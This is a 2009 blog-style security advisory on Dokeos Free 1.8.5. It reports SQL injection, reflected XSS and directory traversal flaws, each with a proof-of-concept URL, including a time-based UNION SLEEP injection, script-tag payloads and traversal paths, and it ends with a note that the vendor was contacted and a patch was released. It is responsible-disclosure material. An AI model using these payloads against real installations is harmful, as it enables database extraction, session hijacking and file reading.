Wednesday, May 13, 2009

Dokeos Free v.1.8.5 Multiple Vulnerabilities

Author: Gerendi Sandor Attila
Date: April 24, 2009
Package: Dokeos Free 1.8.5 Valparais
Product homepage: http://www.dokeos.com/
Versions Affected: v.1.8.5 (Other versions may also be affected)
Severity: High

SQL Injection:

1. The 'uInfo' parameter from /main/tracking/userLog.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Requires magic_quotes_gpc=OFF, but as you can see here: http://www.php.net/magic_quotes, relying on magic_quotes_gpc=ON feature is highly discouraged .

Proof of concept custom request (SLEEP only works with mySQL > 5.0, but there are many another examples):
http://somehost/main/tracking/userLog.php?uInfo=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)%23
this request will 'hang' for 30 seconds.

The resulting query will be:
SELECT * FROM `wa_dokeos_1_8_5_dokeos_main`.`user` WHERE `user_id` = '1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,SLEEP(30)#'
executed from get_user_info_from_id.

2. The 'course' parameter from /main/mySpace/lp_tracking.php is not sanitized before it is used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Exploitation of this is similar with the vulnerability at point 1.
We can also build more complicated injections which will allow us to extract arbitrary data from the database using the true/false condition based sequential extraction mechanism.

XSS (Cross-Site Scripting):

1. The 'curdirpath' parameter from /main/document/slideshow.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
http://somehost/main/document/slideshow.php?curdirpath=1<script>alert(123)</script>
2. The 'file' parameter from /main/exercice/testheaderpage.php is not sanitized before it is returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
http://somehost/main/exercice/testheaderpage.php?file=1<script>alert(123)</script>
Possible directory traversal ineffective sanitation :

In the 'hotspot_lang_conversion.php' file we have for sanitation the $_GET['lang']:

$search = array('../','\\0');
$lang = str_replace($search,'',urldecode($_GET['lang']));

The sanitation is weak here, on windows /../../../ working as well as ..\..\..\..\..\ and the str_replace does not behave well in this situation to remove the NULL character injected from the url request. On windows a query like this will pass the sanitation:

http://somehost/main/exercice/hotspot_lang_conversion.php?lang=..\..\..\..\..\..\..\todo.txt
Directory traversal:

1.Input passed to the "doc_url" parameter in "/main/exercice/Hpdownload.php" isn't properly verified, before it is used to include files. This can be exploited to read arbitrary files from local resources.
http://somehost/main/exercice/Hpdownload.php?doc_url=..\..\..\..\..\..\..\todo.txt
STATUS:
1. Contacted the author at Aprl 29, 2009 via email.
2. The author released a patch (read here).

No comments:

Post a Comment